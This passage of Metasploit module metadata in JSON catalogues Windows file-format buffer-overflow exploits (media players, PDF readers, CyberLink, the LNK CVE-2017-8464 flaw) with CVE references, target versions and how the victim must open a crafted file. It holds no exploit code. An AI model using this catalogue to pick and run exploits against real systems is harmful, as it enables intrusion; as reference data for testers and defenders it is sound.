"/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/boxoft_wav_to_mp3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/bpftp_client_bps_bof": { - "name": "BulletProof FTP Client BPS Buffer Overflow", - "fullname": "exploit/windows/fileformat/bpftp_client_bps_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-07-24", - "type": "exploit", - "author": [ - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n BulletProof FTP Client 2010, caused by an overly long hostname.\n\n By persuading the victim to open a specially-crafted .BPS file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3.", - "references": [ - "EDB-34162", - "EDB-34540", - "EDB-35449", - "OSVDB-109547", - "CVE-2014-2973" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/bpftp_client_bps_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/bsplayer_m3u": { - "name": "BS.Player 2.57 Buffer Overflow (Unicode SEH)", - "fullname": "exploit/windows/fileformat/bsplayer_m3u", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-07", - "type": "exploit", - "author": [ - "C4SS!0 G0M3S", - "Chris Gabriel" - ], - "description": "This module exploits a buffer overflow in BS.Player 2.57. When\n the playlist import is used to import a specially crafted m3u file,\n a buffer overflow occurs allowing arbitrary code execution.", - "references": [ - "OSVDB-82528", - "EDB-15934" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP", - "Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/bsplayer_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/bsplayer_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ca_cab": { - "name": "CA Antivirus Engine CAB Buffer Overflow", - "fullname": "exploit/windows/fileformat/ca_cab", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-06-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\n By creating a specially crafted CAB file, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2007-2864", - "OSVDB-35245", - "BID-24330", - "ZDI-07-035" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ca_cab.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ca_cab", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cain_abel_4918_rdp": { - "name": "Cain and Abel RDP Buffer Overflow", - "fullname": "exploit/windows/fileformat/cain_abel_4918_rdp", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-11-30", - "type": "exploit", - "author": [ - "Trancek " - ], - "description": "This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24\n and below. An attacker must send the file to victim, and the victim must open\n the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.", - "references": [ - "CVE-2008-5405", - "OSVDB-50342", - "EDB-7329", - "BID-32543" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 English", - "Windows XP SP0/1 English", - "Windows XP SP2 Spanish" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cain_abel_4918_rdp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ccmplayer_m3u_bof": { - "name": "CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow", - "fullname": "exploit/windows/fileformat/ccmplayer_m3u_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-11-30", - "type": "exploit", - "author": [ - "Rh0" - ], - "description": "This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening\n a m3u playlist with a long track name, a SEH exception record can be overwritten\n with parts of the controllable buffer. SEH execution is triggered after an\n invalid read of an injectable address, thus allowing arbitrary code execution.\n This module works on multiple Windows platforms including: Windows XP SP3,\n Windows Vista, and Windows 7.", - "references": [ - "CVE-2011-5170", - "OSVDB-77453", - "EDB-18178" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CCMPlayer 1.5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ccmplayer_m3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/chasys_draw_ies_bmp_bof": { - "name": "Chasys Draw IES Buffer Overflow", - "fullname": "exploit/windows/fileformat/chasys_draw_ies_bmp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-26", - "type": "exploit", - "author": [ - "Christopher Gabriel", - "Longinos Recuero Bustos", - "Javier 'soez'", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability found in Chasys Draw IES\n (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while\n parsing BMP files, where the ReadFile function is used to store user provided data\n on the stack in an insecure way. It results in arbitrary code execution under the\n context of the user viewing a specially crafted BMP file. This module has been\n tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7\n SP1.", - "references": [ - "CVE-2013-3928", - "OSVDB-95689", - "BID-61463", - "URL-http://web.archive.org/web/20140326093457/http://secunia.com/advisories/53773/", - "URL-http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/chasys_draw_ies_bmp_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/coolpdf_image_stream_bof": { - "name": "Cool PDF Image Stream Buffer Overflow", - "fullname": "exploit/windows/fileformat/coolpdf_image_stream_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-18", - "type": "exploit", - "author": [ - "Francis Provencher", - "Chris Gabriel", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in Cool PDF Reader prior to version\n 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that\n contains a specially crafted image stream. This module has been tested successfully\n on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2012-4914", - "OSVDB-89349", - "EDB-24463", - "URL-http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Cool PDF 3.0.2.256 / Windows 7 SP1 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/coolpdf_image_stream_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/corelpdf_fusion_bof": { - "name": "Corel PDF Fusion Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/corelpdf_fusion_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-08", - "type": "exploit", - "author": [ - "Kaveh Ghaemmaghami", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in version 1.11 of\n Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry\n names. In order for the payload to be executed, an attacker must convince the target\n user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the\n attacker can execute arbitrary code as the target user.", - "references": [ - "CVE-2013-3248", - "OSVDB-94933", - "BID-61010", - "URL-http://web.archive.org/web/20130720043800/http://secunia.com:80/advisories/52707/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Corel PDF Fusion 1.11 / Windows XP SP3" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/corelpdf_fusion_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/csound_getnum_bof": { - "name": "Csound hetro File Handling Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/csound_getnum_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-23", - "type": "exploit", - "author": [ - "Secunia", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in Csound before 5.16.6.\n The overflow occurs when trying to import a malicious hetro file\n from tabular format.\n In order to achieve exploitation the user should import the malicious\n file through csound with a command like \"csound -U het_import msf.csd file.het\".\n This exploit doesn't work if the \"het_import\" command is used directly\n to convert the file.", - "references": [ - "CVE-2012-0270", - "OSVDB-79491", - "BID-52144", - "URL-http://web.archive.org/web/20120514124556/http://secunia.com/secunia_research/2012-3/", - "URL-http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Csound 5.15 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/csound_getnum_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/csound_getnum_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cutezip_bof": { - "name": "GlobalSCAPE CuteZIP Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/cutezip_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-12", - "type": "exploit", - "author": [ - "C4SS!0 G0M3S ", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of CuteZIP.\n\n In order for the command to be executed, an attacker must convince the target user\n to open a specially crafted zip file with CuteZIP. By doing so, an attacker can\n execute arbitrary code as the target user.", - "references": [ - "OSVDB-85709", - "EDB-16162", - "BID-46375" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CuteZIP 2.1 / Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cutezip_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cutezip_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cve_2017_8464_lnk_rce": { - "name": "LNK Code Execution Vulnerability", - "fullname": "exploit/windows/fileformat/cve_2017_8464_lnk_rce", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-06-13", - "type": "exploit", - "author": [ - "Uncredited", - "Yorick Koster", - "Spencer McIntyre" - ], - "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n If no PATH is specified, the module will use drive letters D through Z so the files\n may be placed in the root path of a drive such as a shared VM folder or USB drive.", - "references": [ - "CVE-2017-8464", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464", - "URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt", - "URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx", - "URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm", - "URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows x64", - "Windows x86" - ], - "mod_time": "2023-03-13 10:31:27 +0000", - "path": "/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cve_2017_8464_lnk_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cyberlink_lpp_bof": { - "name": "CyberLink LabelPrint 2.5 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/cyberlink_lpp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-09-23", - "type": "exploit", - "author": [ - "modpr0be ", - "f3ci " - ], - "description": "This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.\n The vulnerability is triggered when opening a .lpp project file containing overly long string characters\n via open file menu. This results in overwriting a structured exception handler record and take over the\n application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).", - "references": [ - "CVE-2017-14627", - "EDB-42777" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CyberLink LabelPrint <= 2.5 on Windows 7 (64 bit)", - "CyberLink LabelPrint <= 2.5 on Windows 8.1 x64", - "CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cyberlink_lpp_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cyberlink_p2g_bof": { - "name": "CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit", - "fullname": "exploit/windows/fileformat/cyberlink_p2g_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-09-12", - "type": "exploit", - "author": [ - "modpr0be ", - "mr_me " - ], - "description": "This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x\n The vulnerability is triggered when opening a malformed p2g file containing an overly\n long string in the 'name' attribute of the file element. This results in overwriting a\n structured exception handler record.", - "references": [ - "CVE-2011-5171", - "BID-50997", - "OSVDB-77600", - "EDB-18220", - "US-CERT-VU-158003" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CyberLink Power2Go 8 (XP/Vista/win7) Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cyberlink_p2g_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cytel_studio_cy3": { - "name": "Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/cytel_studio_cy3", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-10-02", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "James Fitts " - ], - "description": "This module exploits a stack based buffer overflow found\n in Cytel Studio <= 9.0. The overflow is triggered during the\n copying of strings to a stack buffer of 256 bytes.", - "references": [ - "OSVDB-75991", - "BID-49924", - "URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Cytel Studio 9.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cytel_studio_cy3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/deepburner_path": { - "name": "AstonSoft DeepBurner (DBR File) Path Buffer Overflow", - "fullname": "exploit/windows/fileformat/deepburner_path", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-12-19", - "type": "exploit", - "author": [ - "Expanders", - "fl0 fl0w", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in versions 1.9.0.228,\n 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n DBR file within a browser, since the DBR extension is registered to DeepBurner.", - "references": [ - "BID-21657", - "OSVDB-32356", - "CVE-2006-6665", - "EDB-2950", - "EDB-8335", - "EDB-11315" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/deepburner_path.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/deepburner_path", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/destinymediaplayer16": { - "name": "Destiny Media Player 1.61 PLS M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/destinymediaplayer16", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-01-03", - "type": "exploit", - "author": [ - "Trancek " - ], - "description": "This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.\n An attacker must send the file to victim and the victim must open the file. File-->Open Playlist", - "references": [ - "CVE-2009-3429", - "OSVDB-53249", - "EDB-7651", - "BID-33091" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Destiny Universal", - "Windows XP SP2 Spanish" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/destinymediaplayer16.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/destinymediaplayer16", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/digital_music_pad_pls": { - "name": "Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/digital_music_pad_pls", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-09-17", - "type": "exploit", - "author": [ - "Abhishek Lyall " - ], - "description": "This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n When opening a malicious pls file with the Digital Music Pad,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", - "references": [ - "OSVDB-68178", - "URL-http://web.archive.org/web/20100923154433/http://secunia.com:80/advisories/41519", - "EDB-15134" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/digital_music_pad_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/djstudio_pls_bof": { - "name": "DJ Studio Pro 5.1 .pls Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/djstudio_pls_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-12-30", - "type": "exploit", - "author": [ - "Sebastien Duquette", - "Death-Shadow-Dark " - ], - "description": "This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.\n When handling a .pls file, DJ Studio will copy the user-supplied data on the stack\n without any proper bounds checking done beforehand, therefore allowing code\n execution under the context of the user.", - "references": [ - "CVE-2009-4656", - "OSVDB-58159", - "EDB-10827" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "DJ Studio Pro 5.1.6.5.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/djstudio_pls_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/djstudio_pls_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/djvu_imageurl": { - "name": "DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow", - "fullname": "exploit/windows/fileformat/djvu_imageurl", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-10-30", - "type": "exploit", - "author": [ - "dean " - ], - "description": "This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an\n overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.", - "references": [ - "CVE-2008-4922", - "OSVDB-49592", - "BID-31987" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/djvu_imageurl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/documalis_pdf_editor_and_scanner": { - "name": "Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/documalis_pdf_editor_and_scanner", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-05-22", - "type": "exploit", - "author": [ - "metacom", - "metacom27 " - ], - "description": "Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not\n appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit\n this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the\n user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10", - "Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/documalis_pdf_editor_and_scanner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/dupscout_xml": { - "name": "Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow", - "fullname": "exploit/windows/fileformat/dupscout_xml", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-29", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16\n by using the import command option to import a specially crafted xml file.", - "references": [ - "CVE-2017-7310" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/dupscout_xml.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/dupscout_xml", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/dvdx_plf_bof": { - "name": "DVD X Player 5.5 .plf PlayList Buffer Overflow", - "fullname": "exploit/windows/fileformat/dvdx_plf_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-06-02", - "type": "exploit", - "author": [ - "n00b", - "D3r K0n!G", - "sickness", - "sinn3r " - ], - "description": "This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and\n Standard. By supplying a long string of data in a plf file (playlist), the\n MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,\n and then copy it on the stack without any proper bounds checking, which causes a\n buffer overflow, and results in arbitrary code execution under the context of the user.\n\n This module has been designed to target common Windows systems such as:\n Windows XP SP2/SP3, Windows Vista, and Windows 7.", - "references": [ - "CVE-2007-3068", - "OSVDB-36956", - "BID-24278", - "EDB-17745" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "DVD X Player 5.5 Standard / Pro" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/dvdx_plf_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/dvdx_plf_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/easycdda_pls_bof": { - "name": "Easy CD-DA Recorder PLS Buffer Overflow", - "fullname": "exploit/windows/fileformat/easycdda_pls_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-06-07", - "type": "exploit", - "author": [ - "chap0", - "Gabor Seljan", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.\n By persuading the victim to open a specially-crafted PLS file, a\n remote attacker can execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3 and Windows 7 SP1.", - "references": [ - "BID-40631", - "EDB-13761", - "OSVDB-65256", - "CVE-2010-2343", - "URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Windows 7 SP1 (DEP Bypass)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/easycdda_pls_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/easycdda_pls_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/emc_appextender_keyworks": { - "name": "EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/emc_appextender_keyworks", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-09-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control\n (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's\n Documentation ApplicationXtender 5.4.", - "references": [ - "CVE-2012-2515", - "OSVDB-58423", - "BID-36546" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/emc_appextender_keyworks", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/erdas_er_viewer_bof": { - "name": "ERS Viewer 2011 ERS File Handling Buffer Overflow", - "fullname": "exploit/windows/fileformat/erdas_er_viewer_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-04-23", - "type": "exploit", - "author": [ - "Parvez Anwar", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2011\n (version 11.04). The vulnerability exists in the module ermapper_u.dll where the\n function ERM_convert_to_correct_webpath handles user provided data in an insecure\n way. It results in arbitrary code execution under the context of the user viewing\n a specially crafted .ers file. This module has been tested successfully with ERS\n Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2013-0726", - "OSVDB-92694", - "BID-59379", - "URL-http://web.archive.org/web/20130515231047/http://secunia.com/advisories/51725/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb", - "is_install_path": true, - "ref_name": 